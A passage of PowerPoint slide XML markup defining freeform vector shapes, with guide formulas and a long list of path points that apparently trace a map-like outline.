                  <a:gd name="T15" fmla="*/ 120 h 127"/>
                  <a:gd name="T16" fmla="*/ 160 w 297"/>
                  <a:gd name="T17" fmla="*/ 127 h 127"/>
                  <a:gd name="T18" fmla="*/ 153 w 297"/>
                  <a:gd name="T19" fmla="*/ 120 h 127"/>
                  <a:gd name="T20" fmla="*/ 157 w 297"/>
                  <a:gd name="T21" fmla="*/ 109 h 127"/>
                  <a:gd name="T22" fmla="*/ 150 w 297"/>
                  <a:gd name="T23" fmla="*/ 113 h 127"/>
                  <a:gd name="T24" fmla="*/ 145 w 297"/>
                  <a:gd name="T25" fmla="*/ 116 h 127"/>
                  <a:gd name="T26" fmla="*/ 127 w 297"/>
                  <a:gd name="T27" fmla="*/ 116 h 127"/>
                  <a:gd name="T28" fmla="*/ 123 w 297"/>
                  <a:gd name="T29" fmla="*/ 122 h 127"/>
                  <a:gd name="T30" fmla="*/ 104 w 297"/>
                  <a:gd name="T31" fmla="*/ 124 h 127"/>
                  <a:gd name="T32" fmla="*/ 71 w 297"/>
                  <a:gd name="T33" fmla="*/ 109 h 127"/>
                  <a:gd name="T34" fmla="*/ 66 w 297"/>
                  <a:gd name="T35" fmla="*/ 121 h 127"/>
                  <a:gd name="T36" fmla="*/ 46 w 297"/>
                  <a:gd name="T37" fmla="*/ 110 h 127"/>
                  <a:gd name="T38" fmla="*/ 29 w 297"/>
                  <a:gd name="T39" fmla="*/ 110 h 127"/>
                  <a:gd name="T40" fmla="*/ 19 w 297"/>
                  <a:gd name="T41" fmla="*/ 106 h 127"/>
                  <a:gd name="T42" fmla="*/ 17 w 297"/>
                  <a:gd name="T43" fmla="*/ 97 h 127"/>
                  <a:gd name="T44" fmla="*/ 14 w 297"/>
                  <a:gd name="T45" fmla="*/ 85 h 127"/>
                  <a:gd name="T46" fmla="*/ 6 w 297"/>
                  <a:gd name="T47" fmla="*/ 75 h 127"/>
                  <a:gd name="T48" fmla="*/ 12 w 297"/>
                  <a:gd name="T49" fmla="*/ 72 h 127"/>
                  <a:gd name="T50" fmla="*/ 15 w 297"/>
                  <a:gd name="T51" fmla="*/ 66 h 127"/>
                  <a:gd name="T52" fmla="*/ 11 w 297"/>
                  <a:gd name="T53" fmla="*/ 61 h 127"/>
                  <a:gd name="T54" fmla="*/ 12 w 297"/>
                  <a:gd name="T55" fmla="*/ 54 h 127"/>
                  <a:gd name="T56" fmla="*/ 1 w 297"/>
                  <a:gd name="T57" fmla="*/ 55 h 127"/>
                  <a:gd name="T58" fmla="*/ 1 w 297"/>
                  <a:gd name="T59" fmla="*/ 46 h 127"/>
                  <a:gd name="T60" fmla="*/ 11 w 297"/>
                  <a:gd name="T61" fmla="*/ 35 h 127"/>
                  <a:gd name="T62" fmla="*/ 22 w 297"/>
                  <a:gd name="T63" fmla="*/ 37 h 127"/>
                  <a:gd name="T64" fmla="*/ 25 w 297"/>
                  <a:gd name="T65" fmla="*/ 34 h 127"/>
                  <a:gd name="T66" fmla="*/ 30 w 297"/>
                  <a:gd name="T67" fmla="*/ 36 h 127"/>
                  <a:gd name="T68" fmla="*/ 48 w 297"/>
                  <a:gd name="T69" fmla="*/ 35 h 127"/>
                  <a:gd name="T70" fmla="*/ 54 w 297"/>
                  <a:gd name="T71" fmla="*/ 29 h 127"/>
                  <a:gd name="T72" fmla="*/ 51 w 297"/>
                  <a:gd name="T73" fmla="*/ 28 h 127"/>
                  <a:gd name="T74" fmla="*/ 64 w 297"/>
                  <a:gd name="T75" fmla="*/ 20 h 127"/>
                  <a:gd name="T76" fmla="*/ 84 w 297"/>
                  <a:gd name="T77" fmla="*/ 16 h 127"/>
                  <a:gd name="T78" fmla="*/ 112 w 297"/>
                  <a:gd name="T79" fmla="*/ 2 h 127"/>
                  <a:gd name="T80" fmla="*/ 141 w 297"/>
                  <a:gd name="T81" fmla="*/ 0 h 127"/>
                  <a:gd name="T82" fmla="*/ 157 w 297"/>
                  <a:gd name="T83" fmla="*/ 8 h 127"/>
                  <a:gd name="T84" fmla="*/ 177 w 297"/>
                  <a:gd name="T85" fmla="*/ 22 h 127"/>
                  <a:gd name="T86" fmla="*/ 211 w 297"/>
                  <a:gd name="T87" fmla="*/ 21 h 127"/>
                  <a:gd name="T88" fmla="*/ 241 w 297"/>
                  <a:gd name="T89" fmla="*/ 16 h 127"/>
                  <a:gd name="T90" fmla="*/ 264 w 297"/>
                  <a:gd name="T91" fmla="*/ 11 h 127"/>
                  <a:gd name="T92" fmla="*/ 282 w 297"/>
                  <a:gd name="T93" fmla="*/ 30 h 127"/>
                  <a:gd name="T94" fmla="*/ 295 w 297"/>
                  <a:gd name="T95" fmla="*/ 48 h 127"/>
                  <a:gd name="T96" fmla="*/ 286 w 297"/>
                  <a:gd name="T97" fmla="*/ 58 h 127"/>
                  <a:gd name="T98" fmla="*/ 289 w 297"/>
                  <a:gd name="T99" fmla="*/ 75 h 127"/>
                  <a:gd name="T100" fmla="*/ 288 w 297"/>
                  <a:gd name="T101" fmla="*/ 86 h 127"/>
                  <a:gd name="T102" fmla="*/ 292 w 297"/>
                  <a:gd name="T103" fmla="*/ 95 h 127"/>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297"/>
                  <a:gd name="T157" fmla="*/ 0 h 127"/>
                  <a:gd name="T158" fmla="*/ 297 w 297"/>
                  <a:gd name="T159" fmla="*/ 127 h 127"/>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297" h="127">
                    <a:moveTo>
                      <a:pt x="297" y="101"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="294" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="101"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36449" name="Freeform 181"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3152" y="2209"/>
                <a:ext cx="48" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 48"/>
                  <a:gd name="T1" fmla="*/ 1 h 41"/>
                  <a:gd name="T2" fmla="*/ 32 w 48"/>
                  <a:gd name="T3" fmla="*/ 3 h 41"/>
                  <a:gd name="T4" fmla="*/ 32 w 48"/>
                  <a:gd name="T5" fmla="*/ 6 h 41"/>
                  <a:gd name="T6" fmla="*/ 32 w 48"/>
                  <a:gd name="T7" fmla="*/ 8 h 41"/>
                  <a:gd name="T8" fmla="*/ 33 w 48"/>
                  <a:gd name="T9" fmla="*/ 9 h 41"/>
                  <a:gd name="T10" fmla="*/ 37 w 48"/>
                  <a:gd name="T11" fmla="*/ 12 h 41"/>
                  <a:gd name="T12" fmla="*/ 43 w 48"/>
                  <a:gd name="T13" fmla="*/ 15 h 41"/>
                  <a:gd name="T14" fmla="*/ 47 w 48"/>
                  <a:gd name="T15" fmla="*/ 16 h 41"/>
                  <a:gd name="T16" fmla="*/ 48 w 48"/>
                  <a:gd name="T17" fmla="*/ 17 h 41"/>
                  <a:gd name="T18" fmla="*/ 47 w 48"/>
                  <a:gd name="T19" fmla="*/ 22 h 41"/>
                  <a:gd name="T20" fmla="*/ 44 w 48"/>
                  <a:gd name="T21" fmla="*/ 23 h 41"/>
                  <a:gd name="T22" fmla="*/ 41 w 48"/>
                  <a:gd name="T23" fmla="*/ 23 h 41"/>
                  <a:gd name="T24" fmla="*/ 34 w 48"/>
                  <a:gd name="T25" fmla="*/ 20 h 41"/>
                  <a:gd name="T26" fmla="*/ 32 w 48"/>
                  <a:gd name="T27" fmla="*/ 21 h 41"/>
                  <a:gd name="T28" fmla="*/ 30 w 48"/>
                  <a:gd name="T29" fmla="*/ 22 h 41"/>
                  <a:gd name="T30" fmla="*/ 23 w 48"/>
                  <a:gd name="T31" fmla="*/ 22 h 41"/>
                  <a:gd name="T32" fmla="*/ 20 w 48"/>
                  <a:gd name="T33" fmla="*/ 26 h 41"/>
                  <a:gd name="T34" fmla="*/ 20 w 48"/>
                  <a:gd name="T35" fmla="*/ 28 h 41"/>
                  <a:gd name="T36" fmla="*/ 14 w 48"/>
                  <a:gd name="T37" fmla="*/ 31 h 41"/>
                  <a:gd name="T38" fmla="*/ 9 w 48"/>
                  <a:gd name="T39" fmla="*/ 34 h 41"/>
                  <a:gd name="T40" fmla="*/ 8 w 48"/>
                  <a:gd name="T41" fmla="*/ 36 h 41"/>
                  <a:gd name="T42" fmla="*/ 6 w 48"/>
                  <a:gd name="T43" fmla="*/ 38 h 41"/>
                  <a:gd name="T44" fmla="*/ 4 w 48"/>
                  <a:gd name="T45" fmla="*/ 41 h 41"/>
                  <a:gd name="T46" fmla="*/ 2 w 48"/>
                  <a:gd name="T47" fmla="*/ 41 h 41"/>
                  <a:gd name="T48" fmla="*/ 3 w 48"/>
                  <a:gd name="T49" fmla="*/ 39 h 41"/>
